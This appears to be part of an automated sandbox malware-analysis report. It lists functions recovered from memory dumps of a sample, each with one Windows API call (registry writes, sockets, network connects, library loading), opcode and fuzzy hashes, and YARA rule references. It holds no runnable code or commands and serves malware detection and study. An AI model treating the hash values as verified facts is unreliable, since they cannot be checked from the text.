API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 8c770470a1b18397b8331e327fec0455d4d79321b116b80e68e3fb583f7ab53a
Instruction ID: 39887674505afa5159e97b64e83221a6e80bee6988b844c5d0d145a90c936c67
Opcode Fuzzy Hash: 8c770470a1b18397b8331e327fec0455d4d79321b116b80e68e3fb583f7ab53a
Instruction Fuzzy Hash: 89219571109340AFEB228F55DC44FA7BFB8EF45310F0884AAE9859B156D275E449C762

Uniqueness

Uniqueness Score: -1.00%

Function 05422A3E, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05422AC9

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 92cf420368eb2b591f006595316039fc58b4ffdcc2a37cea1f5652ff167b3ac5
Instruction ID: 69e33301ecd7c32e1f343d33e48fa104bddb8cc8e280adfb6b513dd35c67acfd
Opcode Fuzzy Hash: 92cf420368eb2b591f006595316039fc58b4ffdcc2a37cea1f5652ff167b3ac5
Instruction Fuzzy Hash: 502191B5509380AFE721CF25CC44F66FFE8EF05210F08859EE9858B252D375E408C761

Uniqueness

Uniqueness Score: -1.00%

Function 054243C3, Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542444A

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: f184e784365d09849a7bb84eb7966b58d9041f1183a53d13fa09d9eb3f47bd73
Instruction ID: bb7c841d37a393e9d903d1d8c099a5d9793dd78ff305eb559c9a5693d2c1d65f
Opcode Fuzzy Hash: f184e784365d09849a7bb84eb7966b58d9041f1183a53d13fa09d9eb3f47bd73
Instruction Fuzzy Hash: DD2183711093806FEB12CF65DC45F66BFB8EF46310F08849AED859B152D265E444C761

Uniqueness

Uniqueness Score: -1.00%

Function 05420CC8, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05420D60

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 176d362fd7d9c6f5edf1b45ce2bcb5d7ca2e113c1573232bd5686fa9f15d4b1c
Instruction ID: bf6902d20d4bdaed8c79cca1e619f6770bb0f60045878bacc89d25d5ba9aa016
Opcode Fuzzy Hash: 176d362fd7d9c6f5edf1b45ce2bcb5d7ca2e113c1573232bd5686fa9f15d4b1c
Instruction Fuzzy Hash: 122192B65093906FD7228F15DC45FA3BFB8EF45310F08859BE9859B253D264E448CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0542202C, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 054220C1

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 005317bc4fa1ab056268b5128a145500cfae0bc445be6d36277efbda62fad6ea
Instruction ID: 0558c393293811a786b660a90f56d605fa23d4f9cf306e2c90c8da33f4f74a67
Opcode Fuzzy Hash: 005317bc4fa1ab056268b5128a145500cfae0bc445be6d36277efbda62fad6ea
Instruction Fuzzy Hash: B92128B54087806FE722CB259C44FA3BFB8EF46720F1884DAE9849B153D264E909C772

Uniqueness

Uniqueness Score: -1.00%

Function 0078B5EC, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 0078B686

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5d25d8d18f9e4d12e9b2eb6f16ca147a4f50bbafe29708934f5e993ffd84ec50
Instruction ID: 7bd05b4627817ec39e7edfbe52c18ad3db8512e42e1f4b7fe47b2cab60a8f749
Opcode Fuzzy Hash: 5d25d8d18f9e4d12e9b2eb6f16ca147a4f50bbafe29708934f5e993ffd84ec50
Instruction Fuzzy Hash: D821C8755093C06FD3138B259C51B62BFB4EF87A10F0981DFE9848B653D225A91AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 05421F56, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05421FD5

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 727449e959a47c6ebb7fcb3fbff4b98b00c2210a1a642bdbb42c72915bd5f386
Instruction ID: 1bb671a4f3ef9166563949e989e4d09ed38721c4650ad78c409b9a964624055d
Opcode Fuzzy Hash: 727449e959a47c6ebb7fcb3fbff4b98b00c2210a1a642bdbb42c72915bd5f386
Instruction Fuzzy Hash: 22219C71604740AFE721CF65CC84BA6FBE8FF08310F0885AEE9858B655D775E404CB62

Uniqueness

Uniqueness Score: -1.00%

Function 054228AE, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E80), ref: 0542291F

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 754a3ddc4644717546ba0f943254c9ea78a6e15f97f3c0d4da5ccbd11f0fa542
Instruction ID: b26b284be8463287b7cde837e0bad94d4ba4f1ada2ae19c554d3d900a32ab582
Opcode Fuzzy Hash: 754a3ddc4644717546ba0f943254c9ea78a6e15f97f3c0d4da5ccbd11f0fa542
Instruction Fuzzy Hash: FB21C271604314AFEB20DF29DC85FABBBACEF04720F44846AED45DB245D664E5058A71

Uniqueness

Uniqueness Score: -1.00%

Function 0078A986, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 0078AA05

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8c0ba758e2a0aa69089c6b1f4bc1cf45b664ae660b1712d294b8e5909fe96974
Instruction ID: f4710c8352545da7f011c1fb5a49c149eac3dd687c0962c5c4df4cfa0a35c57b
Opcode Fuzzy Hash: 8c0ba758e2a0aa69089c6b1f4bc1cf45b664ae660b1712d294b8e5909fe96974
Instruction Fuzzy Hash: A321D1B2540304AFE721DF59CC84F6AFBECEF04720F04855AED419B642D664E509CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078B6B2, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078B72E

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: ea1e368737261856148abf4160db0acd62f1fb678539ebbe8718fe2fe5055021
Instruction ID: 998217a6a2ae39b7c73eeeb39ad0aa1f8978b032ebaf92ac0ef2bc2f61943793
Opcode Fuzzy Hash: ea1e368737261856148abf4160db0acd62f1fb678539ebbe8718fe2fe5055021
Instruction Fuzzy Hash: 792192B1509380AFE722CF65DD44F56BFB8EF45320F0884ABE985DB152D264E848CB71

Uniqueness

Uniqueness Score: -1.00%

Function 054236D4, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05423769

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 3b434d423435b17f62dd6cc1cc5ad301d4a551e58f0af799e9cb52ecd594fdff
Instruction ID: 950a1ff0924e919fae89a8fecfe84601cf4513343c5d9431abcc4a8c46f56e4c
Opcode Fuzzy Hash: 3b434d423435b17f62dd6cc1cc5ad301d4a551e58f0af799e9cb52ecd594fdff
Instruction Fuzzy Hash: 4221D3B1409384AFEB228F11DC44FA6FFB8EF46314F0884DBE9849B153C265A508CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078AD6B, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0078ADE6

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8c1f77cc567492e919d5e235b4db809e0805eb5082b351f0d8487163358d6f1b
Instruction ID: f449b7fdd4606740ffdfde6d7782dec48e0619529217bbc1f2bfed92fc15edd3
Opcode Fuzzy Hash: 8c1f77cc567492e919d5e235b4db809e0805eb5082b351f0d8487163358d6f1b
Instruction Fuzzy Hash: 722180765493805FE7128B65DC85B92BFA8EF12320F0984EBEC84CF263D224D808C762

Uniqueness

Uniqueness Score: -1.00%

Function 05422E02, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 05422E75

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 4ca27ea022c51587d9f9d9fe608c1ab25f669ece5122b0b84d62d53dc5631537
Instruction ID: 886b78154743cdb4bb7f9ef4c699f0ead7eecf35f506fb40bc7c5f8a2ced4bd4
Opcode Fuzzy Hash: 4ca27ea022c51587d9f9d9fe608c1ab25f669ece5122b0b84d62d53dc5631537
Instruction Fuzzy Hash: 0821B0756043509FE720DF29CC84BA6FBE8EF04310F0884AAED458B345D775E405CA76

Uniqueness

Uniqueness Score: -1.00%

Function 0542351E, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05423599

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: a7b6200b6a2f619b99370154d1f4b6f5e3fcb5d3502793c19ad0357846ca3370
Instruction ID: ee1319ead6eb7a9dd9d3889c4e0458915613a07194ba5f6ca20818c1ef589270
Opcode Fuzzy Hash: a7b6200b6a2f619b99370154d1f4b6f5e3fcb5d3502793c19ad0357846ca3370
Instruction Fuzzy Hash: 39216D71600314AFEB21CF55CC84FA6BBE8EF04711F4489AAED498B655D734E449CB71

Uniqueness

Uniqueness Score: -1.00%

Function 054244AA, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05424532

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: b607237d6af8dc5223efa35350a44ce72058646d478671c24d8f21b9c209d9c7
Instruction ID: 01fe0b9a831c413d7496337e771951ee8abba6c80fcf13e4931353f0574daee8
Opcode Fuzzy Hash: b607237d6af8dc5223efa35350a44ce72058646d478671c24d8f21b9c209d9c7
Instruction Fuzzy Hash: BC216071509384AFE7228F15DC44F66BFA8EF45310F0885AAED849B152D265A548C761

Uniqueness

Uniqueness Score: -1.00%

Function 054221DE, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542225D

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 3e6257db196fe23eae326adf7dc283db60869b94f4274020bd8d373ed2455e70
Instruction ID: 6e647846b97cb5d3afa6e99f01ae5d81db6cdcf022d782d829c5a844f4a5029e
Opcode Fuzzy Hash: 3e6257db196fe23eae326adf7dc283db60869b94f4274020bd8d373ed2455e70
Instruction Fuzzy Hash: 83219271409380AFEB22CF55DC44F97BFB8EF45320F08849BE9849B152C265A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078AA8E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078AB08

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cd43a5c895383b44be1e9eecd647507a1e701467b9accd1de399d3b396f61288
Instruction ID: 40ef7a94183269d0b096810f40d7c83bc3fcf52692a1d7e6767f1fe8cba05720
Opcode Fuzzy Hash: cd43a5c895383b44be1e9eecd647507a1e701467b9accd1de399d3b396f61288
Instruction Fuzzy Hash: 9E218CB1640304AFE721DE55CD84F66FBECEF04720F08856AE9459B652E768E848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 054237A6, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0542382A

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 830f3f01499cef2364fca1816f605a17745af45e8910efd37ce2263c9bb54e9a
Instruction ID: 0044def7a4720e98d4ed9e58069252ff70bcd7837bee6c90cf09e7e3b0c28ed7
Opcode Fuzzy Hash: 830f3f01499cef2364fca1816f605a17745af45e8910efd37ce2263c9bb54e9a
Instruction Fuzzy Hash: CD219D754093809FDB228F65D884A92BFF4FF06210F0989DEEDC58F563D275A809DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078B050, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0078B0BC

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a58b2a3efd67b14c8c90a46b8a2bf37e38f4d65886b0e1ad15f6fff57de1053c
Instruction ID: 499985c79c2cc396bf70326240b22562491cf8ab448bda78a4d51a59e186d8a5
Opcode Fuzzy Hash: a58b2a3efd67b14c8c90a46b8a2bf37e38f4d65886b0e1ad15f6fff57de1053c
Instruction Fuzzy Hash: 9921A1725093C05FDB128B25DC94792BFB4AF13324F0D84DAEC858F663D265A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 0078ACB7, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0078AD24

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0bd25782e83c019717dab1bec066cd454a4b46b4fe90ea6ff0d2fb20ea4a9789
Instruction ID: 2cabdd85378c5e9a968dae4c5961aeddd8c100415d8a3206ed2c0eb41686ffd3
Opcode Fuzzy Hash: 0bd25782e83c019717dab1bec066cd454a4b46b4fe90ea6ff0d2fb20ea4a9789
Instruction Fuzzy Hash: BE219F7550E3C09FEB138B259891692BFB4EF03220F0984DBECC48F563D2659948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05422353, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 054223D4

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 9dbc145a2f090b8effdf50e298cc3c980fad79055c79518e177f31cfa033666a
Instruction ID: 9327467b654b352cb79c756d21f0ed6e15d5d95293992f25b860342d6577c616
Opcode Fuzzy Hash: 9dbc145a2f090b8effdf50e298cc3c980fad79055c79518e177f31cfa033666a
Instruction Fuzzy Hash: F621C0714083846FE7228B15CC44FA6FFB8EF46324F0884DAED849F153C265A549CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05422A5E, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05422AC9

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: ea5c1683e523eb7ca77290422eeacbc2cf6e1c3097f470ae2bf782edf6f0d1e4
Instruction ID: f3e426a016ed4e051f02cbcc52b106b072a55638cb2a579b632d6dfe935595da
Opcode Fuzzy Hash: ea5c1683e523eb7ca77290422eeacbc2cf6e1c3097f470ae2bf782edf6f0d1e4
Instruction Fuzzy Hash: 1921CF75604340AFE720DF15CC84BA6FBA8EF04320F08846AED858B641D2B5E405CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0078B7BA, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078B81E

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: e1c8ac891f2f8682113efd690b99703d3f29f718c896c93afc227ef0690f6fe7
Instruction ID: e062fccb607bbeb9750713346e500d1f64219e6dec3b28aaa161ff0464a6c053
Opcode Fuzzy Hash: e1c8ac891f2f8682113efd690b99703d3f29f718c896c93afc227ef0690f6fe7
Instruction Fuzzy Hash: DE116D71640304AFEB21DF6ADC85F66BBA8EF44720F14846AED458B255D774E808CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05422556, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 054225C2

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: c35e98e9e05df36963347396953fc6ead2190bd69aecdf7588060d8f3f667c85
Instruction ID: 3085cdf657ce2724e3a43ab2dd4b4578600f2c6e30a6f1fa9091972a75cdfdef
Opcode Fuzzy Hash: c35e98e9e05df36963347396953fc6ead2190bd69aecdf7588060d8f3f667c85
Instruction Fuzzy Hash: 7421CF71504700AFE721CF55DD84BA6FBA5FF04310F04856EE9858B645D3B5A405CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05422B5E, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05422BD2

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 76b4b34dc50c0486d57165894050f8e52373a2c29d69950d88e088ca3e794fbc
Instruction ID: 84451c6eb3221fc3c8ee11786cceab16de966529a8b01e25605ebae40486194d
Opcode Fuzzy Hash: 76b4b34dc50c0486d57165894050f8e52373a2c29d69950d88e088ca3e794fbc
Instruction Fuzzy Hash: D621BB71504200AFE721CF16CD88FA6FBE8EF08320F04855EE9899B241D275E509CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0542261B, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 05422698

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 32265702d7088ae045588097be9ee43a69a904f1ab9b14afba0082e41d42db70
Instruction ID: 091990577272f4a3d1500a4736a091f76d775940a8a1f435dedfd783fee6d56a
Opcode Fuzzy Hash: 32265702d7088ae045588097be9ee43a69a904f1ab9b14afba0082e41d42db70
Instruction Fuzzy Hash: 61216A724093C09FDB228F65DC54AA2BFB4EF07320F0985DAED848F163C265A859CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0078BDFE, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E80), ref: 0078BE87

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 657087fba88707dbc3fdb971151e106a18b9ef784ebad99fe1d1dc2fa9fe60c7
Instruction ID: 3f63fcb768bb0d3e752cb4748a56fc0901231e9f7edd4ed299108c652132a008
Opcode Fuzzy Hash: 657087fba88707dbc3fdb971151e106a18b9ef784ebad99fe1d1dc2fa9fe60c7
Instruction Fuzzy Hash: 5411E4711443406FE721CB15CC85FA6BFB8EF45320F08809AED845F192D374A948C762

Uniqueness

Uniqueness Score: -1.00%

Function 0078AB77, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E80,?,?), ref: 0078ABFA

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: a8ba1643450beed63b8c3c22a753ced55faf56eef558c2217cc3ecb563a83336
Instruction ID: e3abeb35f96285e88e1718c6c14390dd336b2bf431f999455ac403348f197f67
Opcode Fuzzy Hash: a8ba1643450beed63b8c3c22a753ced55faf56eef558c2217cc3ecb563a83336
Instruction Fuzzy Hash: 6121D5715493806FC312DB25CC45F22BFB4EF87610F0981CFE9848B253D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0542155D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 054215D9

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 4043d51ff807f806329ce927612df84355a3eb8b8ffad9a36c46ee1cd0121137
Instruction ID: c946b443e52961af29eb56276bd7d8a0f3154e651cd0b2899445b7e2cdcdc683
Opcode Fuzzy Hash: 4043d51ff807f806329ce927612df84355a3eb8b8ffad9a36c46ee1cd0121137
Instruction Fuzzy Hash: A2218EB55093809FD7228A15DC84B63BFF8FF46214F0980DEED85CB292D365E908C762

Uniqueness

Uniqueness Score: -1.00%

Function 054227C2, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05422834

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: db244ceddf825e6b2b967ec09a06e3b67ff406776c88eaae87581e8e7da310ad
Instruction ID: 498f31361e246bcd04c612179f8d35b57f8c9d31b6524b8fac6f55038c43f52a
Opcode Fuzzy Hash: db244ceddf825e6b2b967ec09a06e3b67ff406776c88eaae87581e8e7da310ad
Instruction Fuzzy Hash: 7111AF76604310AFE721CE56CC84FA7BBA8EF04720F4885AAE9459B651D7A4E508CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 05420DD6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05420E48

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb6ed2517745922aac78b817dd6972ad1f4204693556f3a795b9d98e54e8607a
Instruction ID: b148028a5d686085b8c7c55c96cfebbf65231a7f25c181f2adc715f15d9f17d8
Opcode Fuzzy Hash: bb6ed2517745922aac78b817dd6972ad1f4204693556f3a795b9d98e54e8607a
Instruction Fuzzy Hash: B611AF71200314AFE721CE15CC89FA7FBE8EF04710F44849AED498B656D764E448CA72

Uniqueness

Uniqueness Score: -1.00%

Function 05420CEE, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05420D60

Memory Dump Source

